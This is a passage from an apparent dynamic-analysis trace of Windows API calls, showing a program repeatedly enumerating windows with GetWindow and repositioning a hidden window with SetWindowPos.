uCmd=0x2) returned 0x1002a [0057.542] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.542] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.542] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.542] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.542] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.542] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.542] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.542] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.542] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.542] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.542] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.542] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.542] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.542] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.542] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.542] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.542] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.542] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.542] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.542] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.542] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.542] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.542] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.542] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.543] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.543] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.543] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.543] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.543] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.543] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.543] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.543] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.543] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.543] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.543] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.543] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.543] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.543] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.543] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.543] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.543] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.543] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.543] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.543] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.543] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.543] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.543] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.543] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.543] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.543] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.543] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.543] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.543] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.543] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.543] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.544] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.544] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.544] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.544] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.544] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.544] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.544] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.544] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.544] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.544] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.544] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.544] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.544] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.544] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.544] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.544] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.544] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.544] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.544] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.544] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.544] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.544] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.544] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.544] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.544] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.544] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.544] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.544] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.544] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.544] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.544] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.545] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.545] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.545] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.545] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.545] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.545] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.545] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.545] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.545] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.545] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.545] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.545] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.545] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.545] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.545] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.545] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.545] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.545] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.545] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.545] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.545] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.545] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.545] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.545] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.545] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.545] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.545] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.545] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.545] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.545] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.545] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.545] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.546] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.546] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.546] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.546] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.546] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.546] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.546] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.546] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.546] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.546] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.546] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.546] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.546] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.546] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.546] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.546] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.546] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.546] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.546] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.546] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.546] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.546] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.546] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.546] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.546] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.546] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.546] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.547] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.547] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.547] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.547] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.547] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.547] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.547] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.547] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.547] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.547] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.547] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.547] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.547] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.547] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.547] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.547] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.547] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.547] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.547] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.547] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.547] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.547] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.547] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.547] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.547] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.547] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.547] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.547] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.547] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.548] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.548] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.548] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.548] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.548] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.548] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.548] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.548] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.548] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.548] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.548] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.548] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.548] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.548] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.548] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.548] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.548] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.548] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.548] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.548] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.548] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.548] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.548] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.548] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.549] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.549] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.549] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.549] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.549] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.549] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.549] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.549] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.549] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.549] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.549] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.549] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.549] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.549] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.549] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.549] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.549] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.549] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.549] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.549] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.549] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.549] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.549] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.549] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.549] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.550] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.550] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.550] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.550] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.550] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.550] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.550] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.550] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.550] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.550] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.550] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.550] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.550] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.550] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.550] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.550] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.550] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.550] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.550] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.550] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.550] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.550] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.550] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.550] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.551] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.551] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.551] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.551] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.551] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.551] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.551] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.551] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.551] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.551] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.551] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.551] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.551] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.551] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.551] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.551] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.551] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.551] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.551] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.551] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.551] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.551] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.551] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.551] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.552] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.552] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.552] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.552] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.552] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.552] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.552] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.552] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.552] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.552] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.552] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.552] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.552] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.552] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.552] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.552] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.552] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.552] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.552] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.552] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.552] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.552] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.552] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.552] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.552] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.552] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.552] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.552] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.552] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.552] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.552] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.552] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.553] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.553] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.553] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.553] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.553] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.553] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.553] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.553] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.553] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.553] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.553] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.553] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.553] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.553] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.553] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.553] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.553] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.553] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.553] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.553] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.553] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.553] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.553] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.553] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.553] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.553] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.553] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.553] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.553] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.553] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.553] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.554] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.554] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.554] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.554] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.554] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.554] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.554] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.554] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.554] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.554] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.554] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.554] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.554] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.554] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.554] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.554] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.554] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.554] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.554] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.554] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.554] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.554] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.554] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.554] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.554] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.554] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.554] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.554] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.554] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.554] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.554] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.554] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.555] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.555] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.555] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.555] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.555] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.555] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.555] GetWindow 